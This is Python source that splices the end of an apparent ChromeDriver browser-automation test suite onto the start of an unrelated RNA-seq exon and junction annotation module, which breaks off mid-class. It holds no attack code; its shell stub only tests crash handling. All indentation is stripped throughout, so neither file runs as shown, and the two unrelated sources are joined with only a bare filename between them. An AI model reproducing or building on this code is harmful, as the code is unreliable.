# Windows-specific code for a program that quits and ignores any arguments.
# Linux and Mac should provide good enough coverage.
return
file_descriptor, path = tempfile.mkstemp()
try:
os.write(file_descriptor, '#!/bin/bash\nexit 0')
os.close(file_descriptor)
os.chmod(path, 0o777)
exception_raised = False
try:
driver = chromedriver.ChromeDriver(_CHROMEDRIVER_SERVER_URL,
_CHROMEDRIVER_SERVER_PID,
chrome_binary=path,
test_name=self.id())
except Exception as e:
self.assertIn('Chrome failed to start', e.message)
self.assertIn('exited normally', e.message)
self.assertIn('ChromeDriver is assuming that Chrome has crashed',
e.message)
exception_raised = True
self.assertTrue(exception_raised)
try:
driver.Quit()
except:
pass
finally:
pass
os.remove(path)
def testNoBinaryErrorMessage(self):
temp_dir = tempfile.mkdtemp()
exception_raised = False
try:
driver = chromedriver.ChromeDriver(
_CHROMEDRIVER_SERVER_URL,
_CHROMEDRIVER_SERVER_PID,
chrome_binary=os.path.join(temp_dir, 'this_file_should_not_exist'),
test_name=self.id())
except Exception as e:
self.assertIn('no chrome binary', e.message)
exception_raised = True
finally:
shutil.rmtree(temp_dir)
self.assertTrue(exception_raised)
class PerfTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver perf."""
def _RunDriverPerfTest(self, name, test_func):
"""Runs a perf test ChromeDriver server.
Args:
name: The name of the perf test.
test_func: Called with the server url to perform the test action. Must
return the time elapsed.
"""
result = []
for iteration in range(10):
result += [test_func(_CHROMEDRIVER_SERVER_URL)]
def PrintResult(result):
mean = sum(result) / len(result)
avg_dev = sum([abs(sample - mean) for sample in result]) / len(result)
print('perf result', name, mean, avg_dev, result)
util.AddBuildStepText('%s: %.3f+-%.3f' % (
name, mean, avg_dev))
# Discard first result, which may be off due to cold start.
PrintResult(result[1:])
def testSessionStartTime(self):
def Run(url):
start = monotonic()
driver = self.CreateDriver(url)
end = monotonic()
driver.Quit()
return end - start
self._RunDriverPerfTest('session start', Run)
def testSessionStopTime(self):
def Run(url):
driver = self.CreateDriver(url)
start = monotonic()
driver.Quit()
end = monotonic()
return end - start
self._RunDriverPerfTest('session stop', Run)
def testColdExecuteScript(self):
def Run(url):
driver = self.CreateDriver(url)
start = monotonic()
driver.ExecuteScript('return 1')
end = monotonic()
driver.Quit()
return end - start
self._RunDriverPerfTest('cold exe js', Run)
class HeadlessInvalidCertificateTest(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver."""
@staticmethod
def GetHttpsUrlForFile(file_path):
return (
HeadlessInvalidCertificateTest._https_server.GetUrl() + file_path)
def setUp(self):
self._driver = self.CreateDriver(chrome_switches = ["--headless"],
accept_insecure_certs = True)
def testLoadsPage(self):
print("loading")
self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html'))
# Verify that page content loaded.
self._driver.FindElement('css selector', '#link')
def testNavigateNewWindow(self):
print("loading")
self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html'))
self._driver.ExecuteScript(
'document.getElementById("link").href = "page_test.html";')
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
# Verify that page content loaded in new window.
self._driver.FindElement('css selector', '#link')
class HeadlessChromeDriverTest(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver."""
def setUp(self):
self._driver = self.CreateDriver(chrome_switches=['--headless'])
def _newWindowDoesNotFocus(self, window_type='window'):
current_handles = self._driver.GetWindowHandles()
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/focus_blur_test.html'))
new_window = self._driver.NewWindow(window_type=window_type)
text = self._driver.FindElement('css selector', '#result').GetText()
self.assertTrue(new_window['handle'] not in current_handles)
self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles())
self.assertEquals(text, 'PASS')
def testNewWindowDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='window')
def testNewTabDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='tab')
def testWindowFullScreen(self):
old_rect_list = self._driver.GetWindowRect()
# Testing the resulting screen size doesn't work in headless mode, because
# there is no screen to provide a size.
# We just want to ensure this command doesn't time out or error.
self._driver.FullScreenWindow()
# Restore a known size so next tests won't fail
self._driver.SetWindowRect(*old_rect_list)
def testPrintHeadless(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
pdf = self._driver.PrintPDF({
'orientation': 'landscape',
'scale': 1.1,
'margin': {
'top': 1.1,
'bottom': 2.2,
'left': 3.3,
'right': 4.4
},
'background': True,
'shrinkToFit': False,
'pageRanges': [1],
'page': {
'width': 15.6,
'height': 20.6
}
})
decoded_pdf = base64.b64decode(pdf)
self.assertTrue(decoded_pdf.startswith("%PDF"))
self.assertTrue(decoded_pdf.endswith("%%EOF"))
def testPrintInvalidArgumentHeadless(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self.assertRaises(chromedriver.InvalidArgument,
self._driver.PrintPDF, {'pageRanges': ['x-y']})
class SupportIPv4AndIPv6(ChromeDriverBaseTest):
def testSupportIPv4AndIPv6(self):
has_ipv4 = False
has_ipv6 = False
for info in socket.getaddrinfo('localhost', 0):
if info[0] == socket.AF_INET:
has_ipv4 = True
if info[0] == socket.AF_INET6:
has_ipv6 = True
if has_ipv4:
self.CreateDriver("http://127.0.0.1:" +
str(chromedriver_server.GetPort()))
if has_ipv6:
self.CreateDriver('http://[::1]:' +
str(chromedriver_server.GetPort()))
class JavaScriptTests(ChromeDriverBaseTestWithWebServer):
def GetFileUrl(self, filename):
return 'file://' + self.js_root + filename
def setUp(self):
self._driver = self.CreateDriver()
self.js_root = os.path.dirname(os.path.realpath(__file__)) + '/../js/'
self._driver.SetWindowRect(640, 480, 0, 0)
def checkTestResult(self):
def getStatus():
return self._driver.ExecuteScript('return window.CDCJStestRunStatus')
self.WaitForCondition(getStatus)
self.assertEquals('PASS', getStatus())
def testAllJS(self):
self._driver.Load(self.GetFileUrl('call_function_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('dispatch_touch_event_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('execute_async_script_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('execute_script_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('get_element_location_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('get_element_region_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('is_option_element_toggleable_test.html'))
self.checkTestResult()
self._driver.Load(self.GetFileUrl('focus_test.html'))
self.checkTestResult()
# The 'Z' at the beginning makes this test run at the end of the suite.
class ZChromeStartRetryCountTest(unittest.TestCase):
def testChromeStartRetryCount(self):
self.assertEquals(0, chromedriver.ChromeDriver.retry_count,
"Chrome was retried to start during suite execution "
"in following tests:\n" +
', \n'.join(chromedriver.ChromeDriver.retried_tests))
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option(
'', '--chromedriver',
help='Path to chromedriver server (REQUIRED!)')
parser.add_option(
'', '--log-path',
help='Output verbose server logs to this file')
parser.add_option(
'', '--replayable',
help="Don't truncate long strings in the log so that the log can be "
"replayed.")
parser.add_option(
'', '--chrome', help='Path to a build of the chrome binary')
parser.add_option(
'', '--filter', type='string', default='',
help='Filter for specifying what tests to run; "*" will run all, '
'including tests excluded by default. E.g., *testRunMethod')
parser.add_option(
'', '--android-package',
help=('Android package key. Possible values: ' +
str(list(_ANDROID_NEGATIVE_FILTER.keys()))))
parser.add_option(
'', '--isolated-script-test-output',
help='JSON output file used by swarming')
parser.add_option(
'', '--test-type',
help='Select type of tests to run. Possible value: integration')
options, args = parser.parse_args()
if options.chromedriver is None:
parser.error('--chromedriver is required.\n' +
'Please run "%s --help" for help' % __file__)
options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver)
if (not os.path.exists(options.chromedriver) and
util.GetPlatformName() == 'win' and
not options.chromedriver.lower().endswith('.exe')):
options.chromedriver = options.chromedriver + '.exe'
if not os.path.exists(options.chromedriver):
parser.error('Path given by --chromedriver is invalid.\n' +
'Please run "%s --help" for help' % __file__)
if options.replayable and not options.log_path:
parser.error('Need path specified when replayable log set to true.')
# When running in the commit queue & waterfall, the minidump needs to be
# written to the same directory as the log, so use the same path.
global _MINIDUMP_PATH
if options.log_path:
_MINIDUMP_PATH = os.path.dirname(options.log_path)
global _CHROMEDRIVER_BINARY
_CHROMEDRIVER_BINARY = util.GetAbsolutePathOfUserPath(options.chromedriver)
if (options.android_package and
options.android_package not in _ANDROID_NEGATIVE_FILTER):
parser.error('Invalid --android-package')
global chromedriver_server
chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path,
replayable=options.replayable)
global _CHROMEDRIVER_SERVER_PID
_CHROMEDRIVER_SERVER_PID = chromedriver_server.GetPid()
global _CHROMEDRIVER_SERVER_URL
_CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl()
global _CHROME_BINARY
if options.chrome:
_CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome)
else:
# In some test environments (such as commit queue), it's not convenient to
# specify Chrome binary location on the command line. Try to use heuristics
# to locate the Chrome binary next to the ChromeDriver binary.
driver_path = os.path.dirname(_CHROMEDRIVER_BINARY)
chrome_path = None
platform = util.GetPlatformName()
if platform == 'linux':
chrome_path = os.path.join(driver_path, 'chrome')
elif platform == 'mac':
if os.path.exists(os.path.join(driver_path, 'Google Chrome.app')):
chrome_path = os.path.join(driver_path, 'Google Chrome.app',
'Contents', 'MacOS', 'Google Chrome')
else:
chrome_path = os.path.join(driver_path, 'Chromium.app',
'Contents', 'MacOS', 'Chromium')
elif platform == 'win':
chrome_path = os.path.join(driver_path, 'chrome.exe')
if chrome_path is not None and os.path.exists(chrome_path):
_CHROME_BINARY = chrome_path
else:
_CHROME_BINARY = None
global _ANDROID_PACKAGE_KEY
_ANDROID_PACKAGE_KEY = options.android_package
if _ANDROID_PACKAGE_KEY:
devil_chromium.Initialize()
if options.filter == '':
if _ANDROID_PACKAGE_KEY:
negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY]
else:
negative_filter = _GetDesktopNegativeFilter()
if options.test_type is not None:
if options.test_type == 'integration':
negative_filter += _INTEGRATION_NEGATIVE_FILTER
else:
parser.error('Invalid --test-type. Valid value: integration')
options.filter = '*-' + ':__main__.'.join([''] + negative_filter)
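# Illustrative example of the resulting filter string: with a hypothetical
# negative_filter = ['ChromeDriverTest.testFoo', 'PerfTest.testBar'], the line
# above yields '*-:__main__.ChromeDriverTest.testFoo:__main__.PerfTest.testBar',
# i.e. run everything except the excluded tests.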
all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule(
sys.modules[__name__])
test_suite = unittest_util.FilterTestSuite(all_tests_suite, options.filter)
test_suites = [test_suite]
ChromeDriverBaseTestWithWebServer.GlobalSetUp()
runner = unittest.TextTestRunner(
stream=sys.stdout, descriptions=False, verbosity=2,
resultclass=unittest_util.AddSuccessTextTestResult)
result = runner.run(test_suite)
results = [result]
num_failed = len(result.failures) + len(result.errors)
# Limit retries to at most 10 failed tests, to avoid retrying when a real bug
# causes many tests to fail. Only enable retry for automated bot tests.
if (num_failed > 0 and num_failed <= 10
and options.test_type == 'integration'):
retry_test_suite = unittest.TestSuite()
for f in result.failures:
retry_test_suite.addTest(f[0])
for e in result.errors:
retry_test_suite.addTest(e[0])
test_suites.append(retry_test_suite)
print('\nRetrying failed tests\n')
retry_result = runner.run(retry_test_suite)
results.append(retry_result)
ChromeDriverBaseTestWithWebServer.GlobalTearDown()
if options.isolated_script_test_output:
util.WriteResultToJSONFile(test_suites, results,
options.isolated_script_test_output)
util.TryUploadingResultToResultSink(results)
sys.exit(len(results[-1].failures) + len(results[-1].errors))
RNASeq.py
###RNASeq
#Copyright 2005-2008 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, string, os
from stats_scripts import statistics
import math
import os.path
import unique
import update
import copy
import time
import export
from build_scripts import EnsemblImport; reload(EnsemblImport)
try: from build_scripts import JunctionArrayEnsemblRules
except Exception: pass ### occurs with circular imports
try: from build_scripts import JunctionArray; reload(JunctionArray)
except Exception: pass ### occurs with circular imports
try: from build_scripts import ExonArrayEnsemblRules
except Exception: pass ### occurs with circular imports
import multiprocessing
import logging
import traceback
import warnings
import bisect
import shutil
from visualization_scripts import clustering; reload(clustering)
try:
import scipy
import scipy.cluster.hierarchy as sch
import scipy.spatial.distance as dist
except Exception: pass
try: import numpy
except Exception: pass
LegacyMode = True
try:
from scipy import average as Average
from scipy import stats
except Exception:
try: from statistics import avg as Average
except Exception: pass ### occurs with circular imports
def filepath(filename):
fn = unique.filepath(filename)
return fn
def read_directory(sub_dir):
dir_list_clean=[]
dir_list = unique.read_directory(sub_dir)
for filepath in dir_list:
if 'log.txt' not in filepath and '.log' not in filepath:
dir_list_clean.append(filepath)
return dir_list_clean
def makeUnique(item):
db1={}; list1=[]; k=0
for i in item:
try: db1[i]=[]
except TypeError: db1[tuple(i)]=[]; k=1
for i in db1:
if k==0: list1.append(i)
else: list1.append(list(i))
list1.sort()
return list1
def cleanUpLine(line):
line = string.replace(line,'\n','')
line = string.replace(line,'\c','')
data = string.replace(line,'\r','')
data = string.replace(data,'"','')
return data
######### Below code deals with building the AltDatabase #########
def collapseNoveExonBoundaries(novel_exon_coordinates,dataset_dir):
""" Merge exon predictions based on junction measurments from TopHat. The predicted exons are
bound by the identified splice site and the consensus length of reads in that sample"""
dataset_dir = string.replace(dataset_dir,'exp.','ExpressionInput/novel.')
export_data,status = AppendOrWrite(dataset_dir) ### Export all novel exons
if status == 'not found':
export_data.write('GeneID\tStrand\tExonID\tCoordinates\n')
novel_gene_exon_db={}
for (chr,coord) in novel_exon_coordinates:
key = (chr,coord)
ji,side,coord2 = novel_exon_coordinates[(chr,coord)]
try:
if side == 'left': ### left corresponds to the position of coord
intron = string.split(string.split(ji.ExonRegionID(),'-')[1][:2],'.')[0]
else:
intron = string.split(string.split(ji.ExonRegionID(),'-')[0],'.')[0]
ls = [coord,coord2]
ls.sort() ### The order of this is variable
if ji.Strand() == '-':
coord2,coord = ls
else: coord,coord2 = ls
if 'I' in intron and ji.Novel() == 'side':
#if 'ENSG00000221983' == ji.GeneID():
try: novel_gene_exon_db[ji.GeneID(),ji.Strand(),intron].append((coord,coord2,ji,key,side))
except Exception: novel_gene_exon_db[ji.GeneID(),ji.Strand(),intron] = [(coord,coord2,ji,key,side)]
except Exception: pass
outdatedExons={} ### merging novel exons, delete one of the two original
for key in novel_gene_exon_db:
firstNovel=True ### First putative novel exon coordinates examined for that gene
novel_gene_exon_db[key].sort()
if key[1]=='-':
novel_gene_exon_db[key].reverse()
for (c1,c2,ji,k,s) in novel_gene_exon_db[key]:
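### c1/c2: boundary coordinates of the current putative exon, ji: junction
### object, k: the (chr,coord) key into novel_exon_coordinates, s: side
### ('left' or 'right'); l1/l2/li/ok/os hold the same fields for the
### previously examined entry (recorded at the bottom of the loop)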
if firstNovel==False:
#print [c1,l2] #abs(c1-l2);sys.exit()
### see if the difference between the start position of the second exon is less than 300 nt away from the end of the last
if abs(c2-l1) < 300 and os!=s: ### 80% of human exons are less than 200nt - PMID: 15217358
proceed = True
#if key[1]=='-':
if c2 in k:
novel_exon_coordinates[k] = ji,s,l1
outdatedExons[ok]=None ### merged out entry
elif l1 in ok:
novel_exon_coordinates[ok] = li,os,c2
outdatedExons[k]=None ### merged out entry
else:
proceed = False ### Hence, the two splice-site ends are pointing to two distinct versus one common exons
"""
if c2 == 18683670 or l1 == 18683670:
print key,abs(c2-l1), c1, c2, l1, l2, li.ExonRegionID(), ji.ExonRegionID();
print k,novel_exon_coordinates[k]
print ok,novel_exon_coordinates[ok]
"""
if proceed:
values = string.join([ji.GeneID(),ji.Strand(),key[2],ji.Chr()+':'+str(l1)+'-'+str(c2)],'\t')+'\n'
export_data.write(values)
### For negative strand genes, c1 is larger than c2 but is the 5' beginning of the exon
l1,l2,li,ok,os = c1,c2,ji,k,s ### record the last entry
firstNovel=False
for key in outdatedExons: ### Delete the non-merged entry
del novel_exon_coordinates[key]
export_data.close()
return novel_exon_coordinates
def exportNovelExonToBedCoordinates(species,novel_exon_coordinates,chr_status,searchChr=None):
### Export the novel exon coordinates based on those in the junction BED file to examine the differential expression of the predicted novel exon
#bamToBed -i accepted_hits.bam -split| coverageBed -a stdin -b /home/databases/hESC_differentiation_exons.bed > day20_7B__exons-novel.bed
bed_export_path = filepath('AltDatabase/'+species+'/RNASeq/chr/'+species + '_Ensembl_exons'+searchChr+'.bed')
bed_data = open(bed_export_path,'w') ### Creates or overwrites the file for this chromosome
for (chr,coord) in novel_exon_coordinates:
ji,side,coord2 = novel_exon_coordinates[(chr,coord)]
if side == 'left': start,stop = coord,coord2
if side == 'right': start,stop = coord2,coord
try: gene = ji.GeneID()
except Exception: gene = 'NA'
if gene == None: gene = 'NA'
if gene != 'NA': ### Including these has no benefit for AltAnalyze (just slows down alignment and piles up memory)
if ji.Strand() == '-': stop,start=start,stop
if chr_status == False:
chr = string.replace(chr,'chr','') ### This will thus match up to the BAM files
a = [start,stop]; a.sort(); start,stop = a
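### Each row written below is a standard 6-column, tab-delimited BED line,
### e.g. with illustrative values: chr1 1000 1200 ENSG00000000001 0 +
### (chrom, start, stop, name/gene ID, placeholder score, strand)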
bed_values = [chr,str(start),str(stop),gene,'0',str(ji.Strand())]
bed_values = cleanUpLine(string.join(bed_values,'\t'))+'\n'
bed_data.write(bed_values)
bed_data.close()
return bed_export_path
def moveBAMtoBEDFile(species,dataset_name,root_dir):
bed_export_path = filepath('AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_exons.bed')
dataset_name = string.replace(dataset_name,'exp.','')
new_fn = root_dir+'/BAMtoBED/'+species + '_'+dataset_name+'_exons.bed'
new_fn = string.replace(new_fn,'.txt','')
print 'Writing exon-level coordinates to BED file:'
print new_fn
catFiles(bed_export_path,'chr') ### concatenate the files to the main AltDatabase directory then move
export.customFileMove(bed_export_path,new_fn)
return new_fn
def reformatExonFile(species,type,chr_status):
if type == 'exon':
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt'
export_path = 'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_exons.txt'
### Used by BEDTools to get counts per specific AltAnalyze exon region (should augment with de novo regions identified from junction analyses)
bed_export_path = 'AltDatabase/'+species+'/RNASeq/chr/'+species + '_Ensembl_exons.bed'
bed_data = export.ExportFile(bed_export_path)
else:
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_junction.txt'
export_path = 'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt'
print 'Writing',export_path
export_data = export.ExportFile(export_path)
fn=filepath(filename); x=0
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0:
x+=1
export_title = ['AltAnalyzeID','exon_id','ensembl_gene_id','transcript_cluster_id','chromosome','strand','probeset_start','probeset_stop']
export_title +=['affy_class','constitutive_probeset','ens_exon_ids','ens_constitutive_status','exon_region','exon-region-start(s)','exon-region-stop(s)','splice_events','splice_junctions']
export_title = string.join(export_title,'\t')+'\n'; export_data.write(export_title)
else:
try: gene, exonid, chr, strand, start, stop, constitutive_call, ens_exon_ids, splice_events, splice_junctions = t
except Exception: print t;kill
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if chr == 'M': chr = 'MT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention,
if constitutive_call == 'yes': ens_constitutive_status = '1'
else: ens_constitutive_status = '0'
export_values = [gene+':'+exonid, exonid, gene, '', chr, strand, start, stop, 'known', constitutive_call, ens_exon_ids, ens_constitutive_status]
export_values+= [exonid, start, stop, splice_events, splice_junctions]
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
if type == 'exon':
if chr_status == False:
chr = string.replace(chr,'chr','') ### This will thus match up to the BAM files
bed_values = [chr,start,stop,gene+':'+exonid+'_'+ens_exon_ids,'0',strand]
bed_values = string.join(bed_values,'\t')+'\n'; bed_data.write(bed_values)
export_data.close()
if type == 'exon': bed_data.close()
def importExonAnnotations(species,type,search_chr):
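    ### Import Ensembl exon or junction annotations for the requested chromosome; keys depend on 'type' (gene ID for 'exon'/'junction', (chr,exon1_stop,exon2_start) for 'junction_coordinates', gene -> distal exon ID for 'distal-exon')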
if 'exon' in type:
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt'
else:
filename = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_junction.txt'
fn=filepath(filename); x=0; exon_annotation_db={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: x=1
else:
gene, exonid, chr, strand, start, stop, constitutive_call, ens_exon_ids, splice_events, splice_junctions = t; proceed = 'yes'
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if chr == 'M': chr = 'MT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if len(search_chr)>0:
if chr != search_chr: proceed = 'no'
if proceed == 'yes':
if type == 'exon': start = int(start); stop = int(stop)
ea = EnsemblImport.ExonAnnotationsSimple(chr, strand, start, stop, gene, ens_exon_ids, constitutive_call, exonid, splice_events, splice_junctions)
if type == 'junction_coordinates':
exon1_start,exon1_stop = string.split(start,'|')
exon2_start,exon2_stop = string.split(stop,'|')
if strand == '-':
exon1_stop,exon1_start = exon1_start,exon1_stop
exon2_stop,exon2_start = exon2_start,exon2_stop
#if gene == 'ENSMUSG00000027340': print chr,int(exon1_stop),int(exon2_start)
exon_annotation_db[chr,int(exon1_stop),int(exon2_start)]=ea
elif type == 'distal-exon':
exon_annotation_db[gene] = exonid
else:
try: exon_annotation_db[gene].append(ea)
except KeyError: exon_annotation_db[gene]=[ea]
return exon_annotation_db
def exportKnownJunctionComparisons(species):
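    ### Export reciprocal inclusion/exclusion junction comparisons derived from known Ensembl/UCSC alternative junctions to the species junction_comps.txt file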
gene_junction_db = JunctionArrayEnsemblRules.importEnsemblUCSCAltJunctions(species,'standard')
gene_intronjunction_db = JunctionArrayEnsemblRules.importEnsemblUCSCAltJunctions(species,'_intronic')
for i in gene_intronjunction_db: gene_junction_db[i]=[]
gene_junction_db2={}
for (gene,critical_exon,incl_junction,excl_junction) in gene_junction_db:
critical_exons = string.split(critical_exon,'|')
for critical_exon in critical_exons:
try: gene_junction_db2[gene,incl_junction,excl_junction].append(critical_exon)
except Exception: gene_junction_db2[gene,incl_junction,excl_junction] = [critical_exon]
gene_junction_db = gene_junction_db2; gene_junction_db2=[]
junction_export = 'AltDatabase/' + species + '/RNASeq/'+ species + '_junction_comps.txt'
fn=filepath(junction_export); data = open(fn,'w')
print "Exporting",junction_export
title = 'gene'+'\t'+'critical_exon'+'\t'+'exclusion_junction_region'+'\t'+'inclusion_junction_region'+'\t'+'exclusion_probeset'+'\t'+'inclusion_probeset'+'\t'+'data_source'+'\n'
data.write(title); temp_list=[]
for (gene,incl_junction,excl_junction) in gene_junction_db:
critical_exons = unique.unique(gene_junction_db[(gene,incl_junction,excl_junction)])
critical_exon = string.join(critical_exons,'|')
temp_list.append(string.join([gene,critical_exon,excl_junction,incl_junction,gene+':'+excl_junction,gene+':'+incl_junction,'AltAnalyze'],'\t')+'\n')
temp_list = unique.unique(temp_list)
for i in temp_list: data.write(i)
data.close()
def getExonAndJunctionSequences(species):
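    ### Extract genomic sequence for each AltAnalyze exon region and assemble junction sequences from the ends of the flanking exon sequences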
export_exon_filename = 'AltDatabase/'+species+'/RNASeq/'+species+'_Ensembl_exons.txt'
ensembl_exon_db = ExonArrayEnsemblRules.reimportEnsemblProbesetsForSeqExtraction(export_exon_filename,'null',{})
### Import just the probeset region for mRNA alignment analysis
analysis_type = ('region_only','get_sequence'); array_type = 'RNASeq'
dir = 'AltDatabase/'+species+'/SequenceData/chr/'+species; gene_seq_filename = dir+'_gene-seq-2000_flank.fa'
ensembl_exon_db = EnsemblImport.import_sequence_data(gene_seq_filename,ensembl_exon_db,species,analysis_type)
critical_exon_file = 'AltDatabase/'+species+'/'+ array_type + '/' + array_type+'_critical-exon-seq.txt'
getCriticalJunctionSequences(critical_exon_file,species,ensembl_exon_db)
"""
### Import the full Ensembl exon sequence (not just the probeset region) for miRNA binding site analysis
analysis_type = 'get_sequence'; array_type = 'RNASeq'
dir = 'AltDatabase/'+species+'/SequenceData/chr/'+species; gene_seq_filename = dir+'_gene-seq-2000_flank.fa'
ensembl_exon_db = EnsemblImport.import_sequence_data(gene_seq_filename,ensembl_exon_db,species,analysis_type)
"""
critical_exon_file = 'AltDatabase/'+species+'/'+ array_type + '/' + array_type+'_critical-exon-seq.txt'
updateCriticalExonSequences(critical_exon_file, ensembl_exon_db)
def updateCriticalExonSequences(filename,ensembl_exon_db):
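    ### Write the extracted exon-region (probeset) sequences to an '_updated' critical-exon sequence file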
exon_seq_db_filename = filename[:-4]+'_updated.txt'
exonseq_data = export.ExportFile(exon_seq_db_filename)
critical_exon_seq_db={}; null_count={}
for gene in ensembl_exon_db:
gene_exon_data={}
for probe_data in ensembl_exon_db[gene]:
exon_id,((probe_start,probe_stop,probeset_id,exon_class,transcript_clust),ed) = probe_data
try: gene_exon_data[probeset_id] = ed.ExonSeq()
except Exception: null_count[gene]=[] ### Occurs for non-chromosomal DNA (could also download this sequence though)
if len(gene_exon_data)>0: critical_exon_seq_db[gene] = gene_exon_data
    print len(null_count),'genes not assigned a sequence (e.g., non-chromosomal)'
ensembl_exon_db=[]
### Export exon sequences
for gene in critical_exon_seq_db:
gene_exon_data = critical_exon_seq_db[gene]
for probeset in gene_exon_data:
critical_exon_seq = gene_exon_data[probeset]
values = [probeset,'',critical_exon_seq]
values = string.join(values,'\t')+'\n'
exonseq_data.write(values)
exonseq_data.close()
print exon_seq_db_filename, 'exported....'
def getCriticalJunctionSequences(filename,species,ensembl_exon_db):
### Assemble and export junction sequences
junction_seq_db_filename = string.replace(filename,'exon-seq','junction-seq')
junctionseq_data = export.ExportFile(junction_seq_db_filename)
critical_exon_seq_db={}; null_count={}
for gene in ensembl_exon_db:
gene_exon_data={}
for probe_data in ensembl_exon_db[gene]:
exon_id,((probe_start,probe_stop,probeset_id,exon_class,transcript_clust),ed) = probe_data
try: gene_exon_data[probeset_id] = ed.ExonSeq()
except Exception: null_count[gene]=[] ### Occurs for non-chromosomal DNA (could also download this sequence though)
if len(gene_exon_data)>0: critical_exon_seq_db[gene] = gene_exon_data
    print len(null_count),'genes not assigned a sequence (e.g., non-chromosomal)'
ensembl_exon_db=[]
junction_annotation_db = importExonAnnotations(species,'junction',[])
for gene in junction_annotation_db:
if gene in critical_exon_seq_db:
gene_exon_data = critical_exon_seq_db[gene]
for jd in junction_annotation_db[gene]:
exon1,exon2=string.split(jd.ExonRegionIDs(),'-')
p1=gene+':'+exon1
p2=gene+':'+exon2
p1_seq=gene_exon_data[p1][-15:]
p2_seq=gene_exon_data[p2][:15]
junction_seq = p1_seq+'|'+p2_seq
junctionseq_data.write(gene+':'+jd.ExonRegionIDs()+'\t'+junction_seq+'\t\n')
junctionseq_data.close()
print junction_seq_db_filename, 'exported....'
def getEnsemblAssociations(species,data_type,test_status,force):
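    ### Build the species-specific RNASeq AltDatabase: import UCSC/Ensembl annotations, reformat the exon/junction files, export known junction comparisons and extract exon/junction sequences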
### Get UCSC associations (download databases if necessary)
from build_scripts import UCSCImport
mRNA_Type = 'mrna'; run_from_scratch = 'yes'
export_all_associations = 'no' ### YES only for protein prediction analysis
update.buildUCSCAnnoationFiles(species,mRNA_Type,export_all_associations,run_from_scratch,force)
null = EnsemblImport.getEnsemblAssociations(species,data_type,test_status); null=[]
reformatExonFile(species,'exon',True); reformatExonFile(species,'junction',True)
exportKnownJunctionComparisons(species)
getExonAndJunctionSequences(species)
######### Below code deals with user read alignment as opposed to building the AltDatabase #########
class ExonInfo:
def __init__(self,start,unique_id,annotation):
self.start = start; self.unique_id = unique_id; self.annotation = annotation
def ReadStart(self): return self.start
def UniqueID(self): return self.unique_id
def Annotation(self): return self.annotation
def setExonRegionData(self,rd): self.rd = rd
def ExonRegionData(self): return self.rd
def setExonRegionID(self,region_id): self.region_id = region_id
def ExonRegionID(self): return self.region_id
def setAlignmentRegion(self,region_type): self.region_type = region_type
def AlignmentRegion(self): return self.region_type
def __repr__(self): return "ExonData values"
class JunctionData:
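    ### Container for a single observed junction or exon feature: chromosome, strand, coordinates and biotype, plus the gene/exon-region annotations assigned during alignment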
def __init__(self,chr,strand,exon1_stop,exon2_start,junction_id,biotype):
